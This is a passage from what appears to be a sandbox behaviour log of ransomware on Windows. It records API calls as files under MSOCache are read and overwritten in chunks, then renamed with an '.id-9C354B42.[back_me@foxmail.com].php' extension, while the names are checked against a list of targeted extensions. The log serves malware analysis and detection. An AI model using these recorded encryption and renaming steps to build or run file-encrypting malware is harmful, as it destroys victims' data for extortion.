lpOverlapped=0x0) returned 1 [0048.766] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x46dfa10, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fc2c | out: lpNewFilePointer=0x0) returned 1 [0048.766] ReadFile (in: hFile=0x208, lpBuffer=0x4410058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x3b0fc38, lpOverlapped=0x0 | out: lpBuffer=0x4410058*, lpNumberOfBytesRead=0x3b0fc38*=0x40000, lpOverlapped=0x0) returned 1 [0048.774] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x3b0fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0048.774] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0xd45ee31, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fc2c | out: lpNewFilePointer=0x0) returned 1 [0048.774] ReadFile (in: hFile=0x208, lpBuffer=0x4450058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x3b0fc38, lpOverlapped=0x0 | out: lpBuffer=0x4450058*, lpNumberOfBytesRead=0x3b0fc38*=0x40000, lpOverlapped=0x0) returned 1 [0049.005] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.005] WriteFile (in: hFile=0x208, lpBuffer=0x43d0020*, nNumberOfBytesToWrite=0xc0104, lpNumberOfBytesWritten=0x3b0fcb0, lpOverlapped=0x0 | out: lpBuffer=0x43d0020*, lpNumberOfBytesWritten=0x3b0fcb0*=0xc0104, lpOverlapped=0x0) returned 1 [0049.023] SetEndOfFile (hFile=0x208) returned 1 [0049.023] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x40000) returned 0x42cc930 [0049.024] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fc7c | out: lpNewFilePointer=0x0) returned 1 [0049.024] WriteFile (in: hFile=0x208, lpBuffer=0x42cc930*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x3b0fc88, lpOverlapped=0x0 | out: lpBuffer=0x42cc930*, lpNumberOfBytesWritten=0x3b0fc88*=0x40000, lpOverlapped=0x0) returned 1 [0049.025] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x46dfa10, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fc7c | out: lpNewFilePointer=0x0) returned 1 [0049.025] WriteFile (in: hFile=0x208, lpBuffer=0x42cc930*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x3b0fc88, lpOverlapped=0x0 | out: lpBuffer=0x42cc930*, lpNumberOfBytesWritten=0x3b0fc88*=0x40000, lpOverlapped=0x0) returned 1 [0049.027] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0xd45ee31, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fc7c | out: lpNewFilePointer=0x0) returned 1 [0049.027] WriteFile (in: hFile=0x208, lpBuffer=0x42cc930*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x3b0fc88, lpOverlapped=0x0 | out: lpBuffer=0x42cc930*, lpNumberOfBytesWritten=0x3b0fc88*=0x40000, lpOverlapped=0x0) returned 1 [0049.029] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x42cc930 | out: hHeap=0xb10000) returned 1 [0049.029] CloseHandle (hObject=0x208) returned 1 [0049.030] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0049.030] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 75 [0049.030] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 75 [0049.030] lstrlenW (lpString=".doc") returned 4 [0049.030] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0049.030] lstrlenW (lpString=".docx") returned 5 [0049.030] lstrcmpiW (lpString1=".docx", lpString2="2.cab") returned -1 [0049.030] lstrlenW (lpString=".pdf") returned 4 [0049.030] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0049.030] lstrlenW (lpString=".xls") returned 4 [0049.030] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0049.030] lstrlenW (lpString=".xlsx") returned 5 [0049.030] lstrcmpiW (lpString1=".xlsx", lpString2="2.cab") returned -1 [0049.030] lstrlenW (lpString=".ppt") returned 4 [0049.030] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0049.030] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 75 [0049.030] lstrlenW (lpString=".zip") returned 4 [0049.030] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0049.030] lstrlenW (lpString=".rar") returned 4 [0049.030] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0049.031] lstrlenW (lpString=".bz2") returned 4 [0049.031] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0049.031] lstrlenW (lpString=".7z") returned 3 [0049.031] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0049.031] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 75 [0049.031] lstrlenW (lpString=".dbf") returned 4 [0049.031] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0049.031] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 75 [0049.031] lstrlenW (lpString=".1cd") returned 4 [0049.031] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0049.031] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 75 [0049.031] lstrlenW (lpString=".jpg") returned 4 [0049.031] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0049.031] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 75 [0049.031] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 75 [0049.031] lstrlenW (lpString=".doc") returned 4 [0049.031] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0049.031] lstrlenW (lpString=".docx") returned 5 [0049.031] lstrcmpiW (lpString1=".docx", lpString2="2.cab") returned -1 [0049.031] lstrlenW (lpString=".pdf") returned 4 [0049.031] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0049.031] lstrlenW (lpString=".xls") returned 4 [0049.031] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0049.031] lstrlenW (lpString=".xlsx") returned 5 [0049.031] lstrcmpiW (lpString1=".xlsx", lpString2="2.cab") returned -1 [0049.031] lstrlenW (lpString=".ppt") returned 4 [0049.031] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0049.031] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 75 [0049.031] lstrlenW (lpString=".zip") returned 4 [0049.031] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0049.031] lstrlenW (lpString=".rar") returned 4 [0049.031] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0049.031] lstrlenW (lpString=".bz2") returned 4 [0049.032] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0049.032] lstrlenW (lpString=".7z") returned 3 [0049.032] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0049.032] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 75 [0049.032] lstrlenW (lpString=".dbf") returned 4 [0049.032] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0049.032] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 75 [0049.032] lstrlenW (lpString=".1cd") returned 4 [0049.032] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0049.032] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 75 [0049.032] lstrlenW (lpString=".jpg") returned 4 [0049.032] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0049.032] lstrcmpiW (lpString1=".dll", lpString2=".php") returned -1 [0049.032] lstrlenW (lpString="osetup.dll") returned 10 [0049.032] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\osetup.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0049.828] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0x3b0ff1c | out: lpFileSize=0x3b0ff1c*=7378792) returned 1 [0049.828] CloseHandle (hObject=0x1f4) returned 1 [0049.828] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\osetup.dll")) returned 0x2020 [0049.829] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\osetup.dll.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0049.829] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\osetup.dll"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\osetup.dll.id-9c354b42.[back_me@foxmail.com].php")) returned 1 [0049.829] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\osetup.dll.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0049.829] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fc6c | out: lpNewFilePointer=0x0) returned 1 [0049.829] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fc2c | out: lpNewFilePointer=0x0) returned 1 [0049.829] ReadFile (in: hFile=0x1f4, lpBuffer=0x43d0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x3b0fc38, lpOverlapped=0x0 | out: lpBuffer=0x43d0058*, lpNumberOfBytesRead=0x3b0fc38*=0x40000, lpOverlapped=0x0) returned 1 [0049.833] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x2587cd, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fc2c | out: lpNewFilePointer=0x0) returned 1 [0049.834] ReadFile (in: hFile=0x1f4, lpBuffer=0x4410058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x3b0fc38, lpOverlapped=0x0 | out: lpBuffer=0x4410058*, lpNumberOfBytesRead=0x3b0fc38*=0x40000, lpOverlapped=0x0) returned 1 [0049.838] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x3b0fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0049.838] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x6c9768, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fc2c | out: lpNewFilePointer=0x0) returned 1 [0049.838] ReadFile (in: hFile=0x1f4, lpBuffer=0x4450058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x3b0fc38, lpOverlapped=0x0 | out: lpBuffer=0x4450058*, lpNumberOfBytesRead=0x3b0fc38*=0x40000, lpOverlapped=0x0) returned 1 [0049.861] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.861] WriteFile (in: hFile=0x1f4, lpBuffer=0x43d0020*, nNumberOfBytesToWrite=0xc0100, lpNumberOfBytesWritten=0x3b0fcb0, lpOverlapped=0x0 | out: lpBuffer=0x43d0020*, lpNumberOfBytesWritten=0x3b0fcb0*=0xc0100, lpOverlapped=0x0) returned 1 [0050.611] SetEndOfFile (hFile=0x1f4) returned 1 [0050.611] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x40000) returned 0x432d940 [0050.611] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fc7c | out: lpNewFilePointer=0x0) returned 1 [0050.611] WriteFile (in: hFile=0x1f4, lpBuffer=0x432d940*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x3b0fc88, lpOverlapped=0x0 | out: lpBuffer=0x432d940*, lpNumberOfBytesWritten=0x3b0fc88*=0x40000, lpOverlapped=0x0) returned 1 [0050.613] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x2587cd, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fc7c | out: lpNewFilePointer=0x0) returned 1 [0050.613] WriteFile (in: hFile=0x1f4, lpBuffer=0x432d940*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x3b0fc88, lpOverlapped=0x0 | out: lpBuffer=0x432d940*, lpNumberOfBytesWritten=0x3b0fc88*=0x40000, lpOverlapped=0x0) returned 1 [0050.615] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x6c9768, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fc7c | out: lpNewFilePointer=0x0) returned 1 [0050.615] WriteFile (in: hFile=0x1f4, lpBuffer=0x432d940*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x3b0fc88, lpOverlapped=0x0 | out: lpBuffer=0x432d940*, lpNumberOfBytesWritten=0x3b0fc88*=0x40000, lpOverlapped=0x0) returned 1 [0050.616] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x432d940 | out: hHeap=0xb10000) returned 1 [0050.616] CloseHandle (hObject=0x1f4) returned 1 [0050.616] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0050.617] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0050.617] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0050.617] lstrlenW (lpString=".doc") returned 4 [0050.617] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0050.617] lstrlenW (lpString=".docx") returned 5 [0050.617] lstrcmpiW (lpString1=".docx", lpString2="p.dll") returned -1 [0050.617] lstrlenW (lpString=".pdf") returned 4 [0050.617] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0050.617] lstrlenW (lpString=".xls") returned 4 [0050.617] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0050.617] lstrlenW (lpString=".xlsx") returned 5 [0050.617] lstrcmpiW (lpString1=".xlsx", lpString2="p.dll") returned -1 [0050.617] lstrlenW (lpString=".ppt") returned 4 [0050.617] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0050.617] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0050.617] lstrlenW (lpString=".zip") returned 4 [0050.617] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0050.617] lstrlenW (lpString=".rar") returned 4 [0050.617] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0050.617] lstrlenW (lpString=".bz2") returned 4 [0050.617] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0050.617] lstrlenW (lpString=".7z") returned 3 [0050.617] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0050.617] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0050.617] lstrlenW (lpString=".dbf") returned 4 [0050.617] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0050.617] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0050.617] lstrlenW (lpString=".1cd") returned 4 [0050.617] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0050.617] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0050.617] lstrlenW (lpString=".jpg") returned 4 [0050.617] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0050.618] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0050.618] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0050.618] lstrlenW (lpString=".doc") returned 4 [0050.618] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0050.618] lstrlenW (lpString=".docx") returned 5 [0050.618] lstrcmpiW (lpString1=".docx", lpString2="p.dll") returned -1 [0050.618] lstrlenW (lpString=".pdf") returned 4 [0050.618] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0050.618] lstrlenW (lpString=".xls") returned 4 [0050.618] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0050.618] lstrlenW (lpString=".xlsx") returned 5 [0050.618] lstrcmpiW (lpString1=".xlsx", lpString2="p.dll") returned -1 [0050.618] lstrlenW (lpString=".ppt") returned 4 [0050.618] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0050.618] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0050.618] lstrlenW (lpString=".zip") returned 4 [0050.618] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0050.618] lstrlenW (lpString=".rar") returned 4 [0050.618] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0050.618] lstrlenW (lpString=".bz2") returned 4 [0050.618] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0050.618] lstrlenW (lpString=".7z") returned 3 [0050.618] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0050.618] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0050.618] lstrlenW (lpString=".dbf") returned 4 [0050.618] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0050.618] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0050.618] lstrlenW (lpString=".1cd") returned 4 [0050.618] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0050.618] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0050.618] lstrlenW (lpString=".jpg") returned 4 [0050.618] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0050.619] lstrcmpiW (lpString1=".msi", lpString2=".php") returned -1 [0050.619] lstrlenW (lpString="PrjProrWW.msi") returned 13 [0050.619] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0051.170] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x3b0ff1c | out: lpFileSize=0x3b0ff1c*=10798080) returned 1 [0051.170] CloseHandle (hObject=0x1b0) returned 1 [0051.170] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.msi")) returned 0x2020 [0051.170] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.msi.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0051.170] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.msi.id-9c354b42.[back_me@foxmail.com].php")) returned 1 [0051.171] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.msi.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0051.171] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fc6c | out: lpNewFilePointer=0x0) returned 1 [0051.171] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fc2c | out: lpNewFilePointer=0x0) returned 1 [0051.171] ReadFile (in: hFile=0x1b0, lpBuffer=0x43d0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x3b0fc38, lpOverlapped=0x0 | out: lpBuffer=0x43d0058*, lpNumberOfBytesRead=0x3b0fc38*=0x40000, lpOverlapped=0x0) returned 1 [0051.177] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x36ec00, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fc2c | out: lpNewFilePointer=0x0) returned 1 [0051.177] ReadFile (in: hFile=0x1b0, lpBuffer=0x4410058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x3b0fc38, lpOverlapped=0x0 | out: lpBuffer=0x4410058*, lpNumberOfBytesRead=0x3b0fc38*=0x40000, lpOverlapped=0x0) returned 1 [0051.180] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x3b0fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0051.180] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0xa0c400, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fc2c | out: lpNewFilePointer=0x0) returned 1 [0051.180] ReadFile (in: hFile=0x1b0, lpBuffer=0x4450058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x3b0fc38, lpOverlapped=0x0 | out: lpBuffer=0x4450058*, lpNumberOfBytesRead=0x3b0fc38*=0x40000, lpOverlapped=0x0) returned 1 [0051.198] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.198] WriteFile (in: hFile=0x1b0, lpBuffer=0x43d0020*, nNumberOfBytesToWrite=0xc0106, lpNumberOfBytesWritten=0x3b0fcb0, lpOverlapped=0x0 | out: lpBuffer=0x43d0020*, lpNumberOfBytesWritten=0x3b0fcb0*=0xc0106, lpOverlapped=0x0) returned 1 [0051.358] SetEndOfFile (hFile=0x1b0) returned 1 [0051.594] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x40000) returned 0x434d950 [0052.183] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fc7c | out: lpNewFilePointer=0x0) returned 1 [0052.183] WriteFile (in: hFile=0x1b0, lpBuffer=0x434d950*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x3b0fc88, lpOverlapped=0x0 | out: lpBuffer=0x434d950*, lpNumberOfBytesWritten=0x3b0fc88*=0x40000, lpOverlapped=0x0) returned 1 [0052.185] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x36ec00, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fc7c | out: lpNewFilePointer=0x0) returned 1 [0052.185] WriteFile (in: hFile=0x1b0, lpBuffer=0x434d950*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x3b0fc88, lpOverlapped=0x0 | out: lpBuffer=0x434d950*, lpNumberOfBytesWritten=0x3b0fc88*=0x40000, lpOverlapped=0x0) returned 1 [0052.188] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0xa0c400, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fc7c | out: lpNewFilePointer=0x0) returned 1 [0052.188] WriteFile (in: hFile=0x1b0, lpBuffer=0x434d950*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x3b0fc88, lpOverlapped=0x0 | out: lpBuffer=0x434d950*, lpNumberOfBytesWritten=0x3b0fc88*=0x40000, lpOverlapped=0x0) returned 1 [0052.194] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x434d950 | out: hHeap=0xb10000) returned 1 [0052.194] CloseHandle (hObject=0x1b0) returned 1 [0052.194] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0052.194] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 76 [0052.194] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 76 [0052.194] lstrlenW (lpString=".doc") returned 4 [0052.194] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0052.195] lstrlenW (lpString=".docx") returned 5 [0052.195] lstrcmpiW (lpString1=".docx", lpString2="W.msi") returned -1 [0052.195] lstrlenW (lpString=".pdf") returned 4 [0052.195] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0052.195] lstrlenW (lpString=".xls") returned 4 [0052.195] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0052.195] lstrlenW (lpString=".xlsx") returned 5 [0052.195] lstrcmpiW (lpString1=".xlsx", lpString2="W.msi") returned -1 [0052.195] lstrlenW (lpString=".ppt") returned 4 [0052.195] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0052.195] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 76 [0052.195] lstrlenW (lpString=".zip") returned 4 [0052.195] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0052.195] lstrlenW (lpString=".rar") returned 4 [0052.195] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0052.195] lstrlenW (lpString=".bz2") returned 4 [0052.195] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0052.195] lstrlenW (lpString=".7z") returned 3 [0052.195] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 